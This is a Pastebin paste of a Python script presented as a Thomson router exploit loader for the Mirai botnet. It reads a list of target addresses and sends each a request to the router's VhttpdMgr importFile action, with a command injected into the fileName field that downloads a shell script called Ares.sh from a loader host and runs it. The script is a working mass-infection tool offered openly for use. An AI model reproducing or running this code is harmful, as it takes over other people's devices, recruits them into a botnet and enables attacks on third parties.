xB4ckdoorREAL

[THOMSON ROUTERS EXPLOIT LOADER] [RCE] [MIRAI]

Dec 12th, 2019
327
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.00 KB | None | 0 0
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. # Thomson Reuters Exploit made by B4CKDOOR #
  4. # B4CKDOORARCHIVE.HOST - https://discord.gg/MVktpTW #
  5.  
  6. import threading, random, socket, time, sys, requests, re, os, subprocess
  7.  
  8. if len(sys.argv) < 3:
  9.     print "\033[37mUsage: python "+sys.argv[0]+" <list> <port>\033[37m"
  10.     sys.exit()
  11.  
  12. ip = "1.3.3.7" # BINS LOCATION IP - PORTS 80 DEFAULT
  13. vulns = open(sys.argv[1], "r").readlines()
  14. class send_payload(threading.Thread):
  15.     def __init__ (self, ip):
  16.         threading.Thread.__init__(self)
  17.         self.ip = str(ip).rstrip('\n')
  18.     def run(self):
  19.         try:
  20.             url = "http://" + self.ip + "/VhttpdMgr?action=importFile&fileName=wget http://" + ip + "/Ares.sh; curl -O http://" + ip + "/Ares.sh; chmod +x Ares.sh; ./Ares.sh"
  21.             requests.get(url, timeout=8)
  22.             print "[ThOM5] Loading: %s"%(self.ip)
  23.         except:
  24.             pass
  25.  
  26. for IP in vulns:
  27.     try:
  28.         ip = "".join(IP)
  29.         ip = ip.replace("\n", "")
  30.         t = send_payload(ip)
  31.         t.start()
  32.         time.sleep(0.03)
  33.     except:
  34.         pass #CODED BY B4CKDOOR
Add Comment
Please, Sign In to add comment